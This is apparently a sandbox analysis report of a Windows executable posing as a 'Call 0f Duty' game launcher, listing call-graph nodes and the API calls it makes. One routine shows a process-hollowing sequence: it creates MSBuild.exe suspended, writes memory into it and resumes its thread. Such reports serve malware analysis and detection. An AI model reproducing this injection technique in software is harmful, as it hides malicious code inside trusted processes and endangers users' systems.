6c78e0 8824->8826 8828 6c7a45 8825->8828 8826->8825 8827 6cb0cb __freea 14 API calls 8826->8827 8827->8825 8831 6c8178 LeaveCriticalSection 8828->8831 8830 6c7a2e 8830->8814 8831->8830 8832->8810 8836 6cb94f 8833->8836 8835 6c6fdb CallUnexpected 8835->8790 8837 6cb95e CallUnexpected 8836->8837 8838 6cb96b 8837->8838 8840 6c9d53 8837->8840 8838->8835 8841 6c9e9e __strnicoll 5 API calls 8840->8841 8842 6c9d6f 8841->8842 8842->8838 11035 6ca5f0 11036 6ca5fc __FrameHandler3::FrameUnwindToState 11035->11036 11047 6c8161 EnterCriticalSection 11036->11047 11038 6ca603 11048 6cd839 11038->11048 11045 6ca732 2 API calls 11046 6ca621 11045->11046 11067 6ca647 11046->11067 11047->11038 11049 6cd845 __FrameHandler3::FrameUnwindToState 11048->11049 11050 6cd84e 11049->11050 11051 6cd86f 11049->11051 11052 6cb757 __strnicoll 14 API calls 11050->11052 11070 6c8161 EnterCriticalSection 11051->11070 11054 6cd853 11052->11054 11055 6c7d69 __strnicoll 48 API calls 11054->11055 11056 6ca612 11055->11056 11056->11046 11061 6ca67c GetStartupInfoW 11056->11061 11057 6cd8a7 11078 6cd8ce 11057->11078 11060 6cd87b 11060->11057 11071 6cd789 11060->11071 11062 6ca61c 11061->11062 11063 6ca699 11061->11063 11062->11045 11063->11062 11064 6cd839 49 API calls 11063->11064 11065 6ca6c1 11064->11065 11065->11062 11066 6ca6f1 GetFileType 11065->11066 11066->11065 11082 6c8178 LeaveCriticalSection 11067->11082 11069 6ca632 11070->11060 11072 6cb807 __strnicoll 14 API calls 11071->11072 11073 6cd79b 11072->11073 11076 6c9c11 6 API calls 11073->11076 11077 6cd7a8 11073->11077 11074 6cb0cb __freea 14 API calls 11075 6cd7fd 11074->11075 11075->11060 11076->11073 11077->11074 11081 6c8178 LeaveCriticalSection 11078->11081 11080 6cd8d5 11080->11056 11081->11080 11082->11069 11092 6c6bf0 11093 6cb4a7 ___scrt_uninitialize_crt 77 API calls 11092->11093 11094 6c6bf8 11093->11094 11102 6cb864 11094->11102 11096 6c6bfd 11112 6cb90f 11096->11112 11099 6c6c27 11100 6cb0cb __freea 14 API calls 11099->11100 11101 6c6c32 11100->11101 11103 6cb870 __FrameHandler3::FrameUnwindToState 11102->11103 11116 6c8161 EnterCriticalSection 11103->11116 11105 6cb8e7 11123 6cb906 11105->11123 11107 6cb87b 11107->11105 11109 6cb8bb DeleteCriticalSection 11107->11109 11117 6ced63 11107->11117 11110 6cb0cb __freea 14 API calls 11109->11110 11110->11107 11113 6c6c0c DeleteCriticalSection 11112->11113 11114 6cb926 11112->11114 11113->11096 11113->11099 11114->11113 11115 6cb0cb __freea 14 API calls 11114->11115 11115->11113 11116->11107 11118 6ced76 __strnicoll 11117->11118 11126 6cee21 11118->11126 11120 6ced82 11121 6c7fd7 __strnicoll 48 API calls 11120->11121 11122 6ced8e 11121->11122 11122->11107 11198 6c8178 LeaveCriticalSection 11123->11198 11125 6cb8f3 11125->11096 11127 6cee2d __FrameHandler3::FrameUnwindToState 11126->11127 11128 6cee5a 11127->11128 11129 6cee37 11127->11129 11136 6cee52 11128->11136 11137 6c6aef EnterCriticalSection 11128->11137 11130 6c7f12 __strnicoll 29 API calls 11129->11130 11130->11136 11132 6cee78 11138 6ced93 11132->11138 11134 6cee85 11152 6ceeb0 11134->11152 11136->11120 11137->11132 11139 6ceda0 11138->11139 11140 6cedc3 11138->11140 11141 6c7f12 __strnicoll 29 API calls 11139->11141 11142 6cb515 ___scrt_uninitialize_crt 73 API calls 11140->11142 11151 6cedbb 11140->11151 11141->11151 11143 6ceddb 11142->11143 11144 6cb90f 14 API calls 11143->11144 11145 6cede3 11144->11145 11146 6cd936 ___scrt_uninitialize_crt 48 API calls 11145->11146 11147 6cedef 11146->11147 11155 6d001b 11147->11155 11150 6cb0cb __freea 14 API calls 11150->11151 11151->11134 11197 6c6b03 LeaveCriticalSection 11152->11197 11154 6ceeb6 11154->11136 11156 6d0044 11155->11156 11161 6cedf6 11155->11161 11157 6d0093 11156->11157 11159 6d006b 11156->11159 11158 6c7f12 __strnicoll 29 API calls 11157->11158 11158->11161 11162 6d00be 11159->11162 11161->11150 11161->11151 11163 6d00ca __FrameHandler3::FrameUnwindToState 11162->11163 11170 6cd8d7 EnterCriticalSection 11163->11170 11165 6d00d8 11166 6d0109 11165->11166 11171 6cff7b 11165->11171 11184 6d0143 11166->11184 11170->11165 11172 6cd68e ___scrt_uninitialize_crt 48 API calls 11171->11172 11175 6cff8b 11172->11175 11173 6cff91 11187 6cd6f8 11173->11187 11175->11173 11176 6cffc3 11175->11176 11177 6cd68e ___scrt_uninitialize_crt 48 API calls 11175->11177 11176->11173 11178 6cd68e ___scrt_uninitialize_crt 48 API calls 11176->11178 11179 6cffba 11177->11179 11180 6cffcf CloseHandle 11178->11180 11181 6cd68e ___scrt_uninitialize_crt 48 API calls 11179->11181 11180->11173 11182 6cffdb GetLastError 11180->11182 11181->11176 11182->11173 11183 6cffe9 ___scrt_uninitialize_crt 11183->11166 11196 6cd8fa LeaveCriticalSection 11184->11196 11186 6d012c 11186->11161 11188 6cd76e 11187->11188 11189 6cd707 11187->11189 11190 6cb757 __strnicoll 14 API calls 11188->11190 11189->11188 11195 6cd731 11189->11195 11191 6cd773 11190->11191 11192 6cb76a __dosmaperr 14 API calls 11191->11192 11193 6cd75e 11192->11193 11193->11183 11194 6cd758 SetStdHandle 11194->11193 11195->11193 11195->11194 11196->11186 11197->11154 11198->11125 8523 6c83ac 8526 6cb0cb 8523->8526 8527 6cb0d6 RtlFreeHeap 8526->8527 8531 6c83c4 8526->8531 8528 6cb0eb GetLastError 8527->8528 8527->8531 8529 6cb0f8 __dosmaperr 8528->8529 8532 6cb757 8529->8532 8535 6ca15b GetLastError 8532->8535 8534 6cb75c 8534->8531 8536 6ca171 8535->8536 8539 6ca177 8535->8539 8558 6c9b90 8536->8558 8555 6ca17b SetLastError 8539->8555 8563 6c9bcf 8539->8563 8544 6ca1b0 8547 6c9bcf __strnicoll 6 API calls 8544->8547 8545 6ca1c1 8546 6c9bcf __strnicoll 6 API calls 8545->8546 8549 6ca1cd 8546->8549 8548 6ca1be 8547->8548 8553 6cb0cb __freea 12 API calls 8548->8553 8550 6ca1e8 8549->8550 8551 6ca1d1 8549->8551 8577 6ca31c 8550->8577 8552 6c9bcf __strnicoll 6 API calls 8551->8552 8552->8548 8553->8555 8555->8534 8557 6cb0cb __freea 12 API calls 8557->8555 8582 6c9e9e 8558->8582 8561 6c9bb5 8561->8539 8562 6c9bc7 TlsGetValue 8564 6c9e9e __strnicoll 5 API calls 8563->8564 8565 6c9beb 8564->8565 8566 6c9c09 TlsSetValue 8565->8566 8567 6c9bf4 8565->8567 8567->8555 8568 6cb807 8567->8568 8569 6cb814 8568->8569 8570 6cb854 8569->8570 8571 6cb83f HeapAlloc 8569->8571 8576 6cb828 __strnicoll 8569->8576 8573 6cb757 __strnicoll 13 API calls 8570->8573 8572 6cb852 8571->8572 8571->8576 8574 6ca1a8 8572->8574 8573->8574 8574->8544 8574->8545 8576->8570 8576->8571 8597 6c7207 8576->8597 8611 6ca482 8577->8611 8583 6c9ece 8582->8583 8587 6c9bac 8582->8587 8583->8587 8589 6c9dd3 8583->8589 8586 6c9ee8 GetProcAddress 8586->8587 8588 6c9ef8 __strnicoll 8586->8588 8587->8561 8587->8562 8588->8587 8595 6c9de4 ___vcrt_FlsFree 8589->8595 8590 6c9e7a 8590->8586 8590->8587 8591 6c9e02 LoadLibraryExW 8592 6c9e1d GetLastError 8591->8592 8593 6c9e81 8591->8593 8592->8595 8593->8590 8594 6c9e93 FreeLibrary 8593->8594 8594->8590 8595->8590 8595->8591 8596 6c9e50 LoadLibraryExW 8595->8596 8596->8593 8596->8595 8600 6c7242 8597->8600 8601 6c724e __FrameHandler3::FrameUnwindToState 8600->8601 8606 6c8161 EnterCriticalSection 8601->8606 8603 6c7259 CallUnexpected 8607 6c7290 8603->8607 8606->8603 8610 6c8178 LeaveCriticalSection 8607->8610 8609 6c7212 8609->8576 8610->8609 8612 6ca48e __FrameHandler3::FrameUnwindToState 8611->8612 8625 6c8161 EnterCriticalSection 8612->8625 8614 6ca498 8626 6ca4c8 8614->8626 8617 6ca4d4 8618 6ca4e0 __FrameHandler3::FrameUnwindToState 8617->8618 8630 6c8161 EnterCriticalSection 8618->8630 8620 6ca4ea 8631 6ca2d1 8620->8631 8622 6ca502 8635 6ca522 8622->8635 8625->8614 8629 6c8178 LeaveCriticalSection 8626->8629 8628 6ca38a 8628->8617 8629->8628 8630->8620 8632 6ca2e0 __strnicoll 8631->8632 8634 6ca307 __strnicoll 8631->8634 8632->8634 8638 6cbfae 8632->8638 8634->8622 8752 6c8178 LeaveCriticalSection 8635->8752 8637 6ca1f3 8637->8557 8639 6cc02e 8638->8639 8642 6cbfc4 8638->8642 8640 6cc07c 8639->8640 8643 6cb0cb __freea 14 API calls 8639->8643 8706 6cc148 8640->8706 8642->8639 8644 6cbff7 8642->8644 8649 6cb0cb __freea 14 API calls 8642->8649 8645 6cc050 8643->8645 8646 6cc019 8644->8646 8655 6cb0cb __freea 14 API calls 8644->8655 8647 6cb0cb __freea 14 API calls 8645->8647 8648 6cb0cb __freea 14 API calls 8646->8648 8650 6cc063 8647->8650 8651 6cc023 8648->8651 8653 6cbfec 8649->8653 8656 6cb0cb __freea 14 API calls 8650->8656 8659 6cb0cb __freea 14 API calls 8651->8659 8652 6cc0ea 8660 6cb0cb __freea 14 API calls 8652->8660 8666 6cb9d5 8653->8666 8654 6cc08a 8654->8652 8662 6cb0cb 14 API calls __freea 8654->8662 8657 6cc00e 8655->8657 8658 6cc071 8656->8658 8694 6cbad3 8657->8694 8664 6cb0cb __freea 14 API calls 8658->8664 8659->8639 8665 6cc0f0 8660->8665 8662->8654 8664->8640 8665->8634 8667 6cb9e6 8666->8667 8668 6cbacf 8666->8668 8669 6cb9f7 8667->8669 8670 6cb0cb __freea 14 API calls 8667->8670 8668->8644 8671 6cba09 8669->8671 8672 6cb0cb __freea 14 API calls 8669->8672 8670->8669 8673 6cba1b 8671->8673 8674 6cb0cb __freea 14 API calls 8671->8674 8672->8671 8675 6cba2d 8673->8675 8677 6cb0cb __freea 14 API calls 8673->8677 8674->8673 8676 6cba3f 8675->8676 8678 6cb0cb __freea 14 API calls 8675->8678 8679 6cba51 8676->8679 8680 6cb0cb __freea 14 API calls 8676->8680 8677->8675 8678->8676 8681 6cba63 8679->8681 8682 6cb0cb __freea 14 API calls 8679->8682 8680->8679 8683 6cba75 8681->8683 8685 6cb0cb __freea 14 API calls 8681->8685 8682->8681 8684 6cba87 8683->8684 8686 6cb0cb __freea 14 API calls 8683->8686 8687 6cba99 8684->8687 8688 6cb0cb __freea 14 API calls 8684->8688 8685->8683 8686->8684 8689 6cbaab 8687->8689 8690 6cb0cb __freea 14 API calls 8687->8690 8688->8687 8691 6cbabd 8689->8691 8692 6cb0cb __freea 14 API calls 8689->8692 8690->8689 8691->8668 8693 6cb0cb __freea 14 API calls 8691->8693 8692->8691 8693->8668 8695 6cbb38 8694->8695 8696 6cbae0 8694->8696 8695->8646 8697 6cbaf0 8696->8697 8699 6cb0cb __freea 14 API calls 8696->8699 8698 6cbb02 8697->8698 8700 6cb0cb __freea 14 API calls 8697->8700 8701 6cbb14 8698->8701 8702 6cb0cb __freea 14 API calls 8698->8702 8699->8697 8700->8698 8703 6cbb26 8701->8703 8704 6cb0cb __freea 14 API calls 8701->8704 8702->8701 8703->8695 8705 6cb0cb __freea 14 API calls 8703->8705 8704->8703 8705->8695 8707 6cc155 8706->8707 8708 6cc174 8706->8708 8707->8708 8712 6cbb3c 8707->8712 8708->8654 8711 6cb0cb __freea 14 API calls 8711->8708 8713 6cbc1a 8712->8713 8714 6cbb4d 8712->8714 8713->8711 8748 6cbc20 8714->8748 8717 6cbc20 __strnicoll 14 API calls 8718 6cbb60 8717->8718 8719 6cbc20 __strnicoll 14 API calls 8718->8719 8720 6cbb6b 8719->8720 8721 6cbc20 __strnicoll 14 API calls 8720->8721 8722 6cbb76 8721->8722 8723 6cbc20 __strnicoll 14 API calls 8722->8723 8724 6cbb84 8723->8724 8725 6cb0cb __freea 14 API calls 8724->8725 8726 6cbb8f 8725->8726 8727 6cb0cb __freea 14 API calls 8726->8727 8728 6cbb9a 8727->8728 8729 6cb0cb __freea 14 API calls 8728->8729 8730 6cbba5 8729->8730 8731 6cbc20 __strnicoll 14 API calls 8730->8731 8732 6cbbb3 8731->8732 8733 6cbc20 __strnicoll 14 API calls 8732->8733 8734 6cbbc1 8733->8734 8735 6cbc20 __strnicoll 14 API calls 8734->8735 8736 6cbbd2 8735->8736 8737 6cbc20 __strnicoll 14 API calls 8736->8737 8738 6cbbe0 8737->8738 8739 6cbc20 __strnicoll 14 API calls 8738->8739 8740 6cbbee 8739->8740 8741 6cb0cb __freea 14 API calls 8740->8741 8742 6cbbf9 8741->8742 8743 6cb0cb __freea 14 API calls 8742->8743 8744 6cbc04 8743->8744 8745 6cb0cb __freea 14 API calls 8744->8745 8746 6cbc0f 8745->8746 8747 6cb0cb __freea 14 API calls 8746->8747 8747->8713 8749 6cbc32 8748->8749 8750 6cbb55 8749->8750 8751 6cb0cb __freea 14 API calls 8749->8751 8750->8717 8751->8749 8752->8637 11403 6caca2 11406 6c8178 LeaveCriticalSection 11403->11406 11405 6caca9 11406->11405 11421 6ca2b0 11422 6ca2cb 11421->11422 11423 6ca2bb 11421->11423 11427 6ca3b5 11423->11427 11426 6cb0cb __freea 14 API calls 11426->11422 11428 6ca3ca 11427->11428 11432 6ca3d0 11427->11432 11429 6cb0cb __freea 14 API calls 11428->11429 11429->11432 11430 6cb0cb __freea 14 API calls 11431 6ca3dc 11430->11431 11433 6cb0cb __freea 14 API calls 11431->11433 11432->11430 11434 6ca3e7 11433->11434 11435 6cb0cb __freea 14 API calls 11434->11435 11436 6ca3f2 11435->11436 11437 6cb0cb __freea 14 API calls 11436->11437 11438 6ca3fd 11437->11438 11439 6cb0cb __freea 14 API calls 11438->11439 11440 6ca408 11439->11440 11441 6cb0cb __freea 14 API calls 11440->11441 11442 6ca413 11441->11442 11443 6cb0cb __freea 14 API calls 11442->11443 11444 6ca41e 11443->11444 11445 6cb0cb __freea 14 API calls 11444->11445 11446 6ca429 11445->11446 11447 6cb0cb __freea 14 API calls 11446->11447 11448 6ca437 11447->11448 11453 6ca52e 11448->11453 11454 6ca53a __FrameHandler3::FrameUnwindToState 11453->11454 11469 6c8161 EnterCriticalSection 11454->11469 11457 6ca544 11459 6cb0cb __freea 14 API calls 11457->11459 11460 6ca56e 11457->11460 11459->11460 11470 6ca58d 11460->11470 11461 6ca599 11462 6ca5a5 __FrameHandler3::FrameUnwindToState 11461->11462 11474 6c8161 EnterCriticalSection 11462->11474 11464 6ca5af 11465 6ca2d1 __strnicoll 14 API calls 11464->11465 11466 6ca5c2 11465->11466 11475 6ca5e2 11466->11475 11469->11457 11473 6c8178 LeaveCriticalSection 11470->11473 11472 6ca45d 11472->11461 11473->11472 11474->11464 11478 6c8178 LeaveCriticalSection 11475->11478 11477 6ca2c3 11477->11426 11478->11477 8753 6db18d 8760 6db1c3 8753->8760 8754 6db310 GetPEB 8755 6db322 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 8754->8755 8756 6db3c9 WriteProcessMemory 8755->8756 8755->8760 8757 6db40e 8756->8757 8758 6db450 WriteProcessMemory Wow64SetThreadContext ResumeThread 8757->8758 8759 6db413 WriteProcessMemory 8757->8759 8759->8757 8760->8754 8760->8755 10736 6c7310 10739 6c7337 10736->10739 10740 6c7343 __FrameHandler3::FrameUnwindToState 10739->10740 10747 6c8161 EnterCriticalSection 10740->10747 10742 6c737b 10748 6c7399 10742->10748 10743 6c734d 10743->10742 10745 6cc1fa __strnicoll 14 API calls 10743->10745 10745->10743 10747->10743 10751 6c8178 LeaveCriticalSection 10748->10751 10750 6c7335 10751->10750 10752 6c5610 10753 6c5618 10752->10753 10771 6c82ea 10753->10771 10755 6c5623 10778 6c50f0 10755->10778 10757 6c5444 4 API calls 10759 6c56ba 10757->10759 10758 6c5638 __RTC_Initialize 10769 6c5695 10758->10769 10784 6c4f6a 10758->10784 10761 6c5651 10787 6c73a5 10761->10787 10765 6c5667 10818 6c5933 10765->10818 10767 6c568a 10824 6c72a4 10767->10824 10769->10757 10770 6c56b2 10769->10770 10772 6c831c 10771->10772 10773 6c82f9 10771->10773 10772->10755 10773->10772 10774 6cb757 __strnicoll 14 API calls 10773->10774 10775 6c830c 10774->10775 10776 6c7d69 __strnicoll 48 API calls 10775->10776 10777 6c8317 10776->10777 10777->10755 10779 6c50fc 10778->10779 10780 6c5100 10778->10780 10779->10758 10781 6c5444 4 API calls 10780->10781 10783 6c510d ___scrt_release_startup_lock 10780->10783 10782 6c5176 10781->10782 10783->10758 10831 6c4f7f 10784->10831 10788 6c73ff 10787->10788 10789 6c7437 10788->10789 10790 6c7421 10788->10790 10810 6c565c 10788->10810 10791 6ca880 58 API calls 10789->10791 10792 6cb757 __strnicoll 14 API calls 10790->10792 10793 6c743d 10791->10793 10794 6c7426 10792->10794 10866 6cca78 GetModuleFileNameW 10793->10866 10796 6c7d69 __strnicoll 48 API calls 10794->10796 10796->10810 10802 6c7499 10804 6cb757 __strnicoll 14 API calls 10802->10804 10803 6c74a5 10805 6c753c 48 API calls 10803->10805 10806 6c749e 10804->10806 10807 6c74bb 10805->10807 10809 6cb0cb __freea 14 API calls 10806->10809 10807->10806 10808 6c74df 10807->10808 10811 6c74f6 10808->10811 10812 6c7500 10808->10812 10809->10810 10810->10769 10817 6c5918 InitializeSListHead 10810->10817 10813 6cb0cb __freea 14 API calls 10811->10813 10815 6cb0cb __freea 14 API calls 10812->10815 10814 6c74fe 10813->10814 10816 6cb0cb __freea 14 API calls 10814->10816 10815->10814 10816->10810 10817->10765 10922 6c76b0 10818->10922 10820 6c5944 10821 6c594b 10820->10821 10822 6c5444 4 API calls 10820->10822 10821->10767 10823 6c5953 10822->10823 10825 6ca00a _unexpected 48 API calls 10824->10825 10827 6c72af 10825->10827 10826 6c72e7 10826->10769 10827->10826 10828 6cb757 __strnicoll 14 API calls 10827->10828 10829 6c72dc 10828->10829 10830 6c7d69 __strnicoll 48 API calls 10829->10830 10830->10826 10832 6c4f8e 10831->10832 10833 6c4f95 10831->10833 10837 6c77a9 10832->10837 10840 6c7738 10833->10840 10836 6c4f75 10836->10761 10838 6c7738 51 API calls 10837->10838 10839 6c77bb 10838->10839 10839->10836 10843 6c799b 10840->10843 10844 6c79a7 __FrameHandler3::FrameUnwindToState 10843->10844 10851 6c8161 EnterCriticalSection 10844->10851 10846 6c79b5 10852 6c77bf 10846->10852 10848 6c79c2 10862 6c79ea 10848->10862 10851->10846 10853 6c77da 10852->10853 10854 6c784d __strnicoll 10852->10854 10853->10854 10855 6c782d 10853->10855 10856 6cd0c4 51 API calls 10853->10856 10854->10848 10855->10854 10857 6cd0c4 51 API calls 10855->10857 10858 6c7823 10856->10858 10859 6c7843 10857->10859 10860 6cb0cb __freea 14 API calls 10858->10860 10861 6cb0cb __freea 14 API calls 10859->10861 10860->10855 10861->10854 10865 6c8178 LeaveCriticalSection 10862->10865 10864 6c7769 10864->10836 10865->10864 10867 6ccab8 10866->10867 10868 6ccaa7 GetLastError 10866->10868 10870 6cc274 48 API calls 10867->10870 10869 6cb77d __dosmaperr 14 API calls 10868->10869 10871 6ccab3 10869->10871 10872 6ccae9 10870->10872 10874 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 10871->10874 10888 6ccb54 10872->10888 10875 6c7450 10874->10875 10876 6c753c 10875->10876 10878 6c7562 10876->10878 10880 6c75c0 10878->10880 10916 6ccc16 10878->10916 10879 6c7483 10882 6c73b0 10879->10882 10880->10879 10881 6ccc16 48 API calls 10880->10881 10881->10880 10883 6c73f3 10882->10883 10884 6c73c1 10882->10884 10883->10802 10883->10803 10884->10883 10885 6cb807 __strnicoll 14 API calls 10884->10885 10886 6c73ea 10885->10886 10887 6cb0cb __freea 14 API calls 10886->10887 10887->10883 10889 6ccb70 10888->10889 10890 6ccb61 10888->10890 10891 6ccb9d 10889->10891 10892 6ccb78 10889->10892 10890->10871 10893 6cd131 ___scrt_uninitialize_crt WideCharToMultiByte 10891->10893 10892->10890 10909 6ccb19 10892->10909 10895 6ccbad 10893->10895 10896 6ccbca 10895->10896 10897 6ccbb4 GetLastError 10895->10897 10899 6ccbdb 10896->10899 10900 6ccb19 14 API calls 10896->10900 10898 6cb77d __dosmaperr 14 API calls 10897->10898 10902 6ccbc0 10898->10902 10899->10890 10913 6cc594 10899->10913 10900->10899 10904 6cb757 __strnicoll 14 API calls 10902->10904 10904->10890 10905 6ccbf5 GetLastError 10906 6cb77d __dosmaperr 14 API calls 10905->10906 10907 6ccc01 10906->10907 10908 6cb757 __strnicoll 14 API calls 10907->10908 10908->10890 10910 6ccb24 10909->10910 10911 6cb757 __strnicoll 14 API calls 10910->10911 10912 6ccb2d 10911->10912 10912->10890 10914 6cd131 ___scrt_uninitialize_crt WideCharToMultiByte 10913->10914 10915 6cc5b1 10914->10915 10915->10890 10915->10905 10919 6ccc2e 10916->10919 10920 6ca8c8 __strnicoll 48 API calls 10919->10920 10921 6ccc29 10920->10921 10921->10878 10923 6c76ce 10922->10923 10927 6c76ee 10922->10927 10924 6cb757 __strnicoll 14 API calls 10923->10924 10925 6c76e4 10924->10925 10926 6c7d69 __strnicoll 48 API calls 10925->10926 10926->10927 10927->10820

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,006DB0FF,006DB0EF), ref: 006DB323
                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 006DB336
                                                                                                • Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 006DB354
                                                                                                • ReadProcessMemory.KERNELBASE(00000094,?,006DB143,00000004,00000000), ref: 006DB378
                                                                                                • VirtualAllocEx.KERNELBASE(00000094,?,?,00003000,00000040), ref: 006DB3A3
                                                                                                • WriteProcessMemory.KERNELBASE(00000094,00000000,?,?,00000000,?), ref: 006DB3FB
                                                                                                • WriteProcessMemory.KERNELBASE(00000094,00400000,?,?,00000000,?,00000028), ref: 006DB446
                                                                                                • WriteProcessMemory.KERNELBASE(00000094,?,?,00000004,00000000), ref: 006DB484
                                                                                                • Wow64SetThreadContext.KERNEL32(00000098,031F0000), ref: 006DB4C0
                                                                                                • ResumeThread.KERNELBASE(00000098), ref: 006DB4CF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                • API String ID: 2687962208-3857624555
                                                                                                • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                • Instruction ID: 0e5c911ca2c0eb564ce94fb0ce59fac31897ca87ed5711d5ae8e5ea6db8e179e
                                                                                                • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                • Instruction Fuzzy Hash: ACB1F77660064AEFDB60CF68CC80BDA73A5FF88714F168525EA08AB345D770FA51CB94
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8652d58fb1d9cddebc248ef8a056a777e83e2e39abab3dc9b0924062e89607ee
                                                                                                • Instruction ID: 01e29318ad48eb90c24fe06615d0f1df8025886c3e3e50684888091a3c07d83c
                                                                                                • Opcode Fuzzy Hash: 8652d58fb1d9cddebc248ef8a056a777e83e2e39abab3dc9b0924062e89607ee
                                                                                                • Instruction Fuzzy Hash: 690119749042088FC754DF68D885BD9F7F0EB18710F0185ADA88897340EB74AA84CF85

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 26 6c9dd3-6c9ddf 27 6c9e71-6c9e74 26->27 28 6c9e7a 27->28 29 6c9de4-6c9df5 27->29 30 6c9e7c-6c9e80 28->30 31 6c9df7-6c9dfa 29->31 32 6c9e02-6c9e1b LoadLibraryExW 29->32 33 6c9e9a-6c9e9c 31->33 34 6c9e00 31->34 35 6c9e1d-6c9e26 GetLastError 32->35 36 6c9e81-6c9e91 32->36 33->30 38 6c9e6e 34->38 39 6c9e5f-6c9e6c 35->39 40 6c9e28-6c9e3a call 6cbc93 35->40 36->33 37 6c9e93-6c9e94 FreeLibrary 36->37 37->33 38->27 39->38 40->39 43 6c9e3c-6c9e4e call 6cbc93 40->43 43->39 46 6c9e50-6c9e5d LoadLibraryExW 43->46 46->36 46->39
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,C362B542,?,006C9EE2,?,?,00000000), ref: 006C9E94
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                • API String ID: 3664257935-537541572
                                                                                                • Opcode ID: 04175c34c7f44948e6a704401c39e831d9dcf5a439a291983e87316c3f8d7a13
                                                                                                • Instruction ID: 589b79a4d90eb2710e1a7d2662be3f0103cbb116253530096fb13e8f4e42b0b8
                                                                                                • Opcode Fuzzy Hash: 04175c34c7f44948e6a704401c39e831d9dcf5a439a291983e87316c3f8d7a13
                                                                                                • Instruction Fuzzy Hash: 0C21C331E02211ABC721DB649C49FAA375BEFA5760F25112AE906A7391DB30ED01C6F0

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
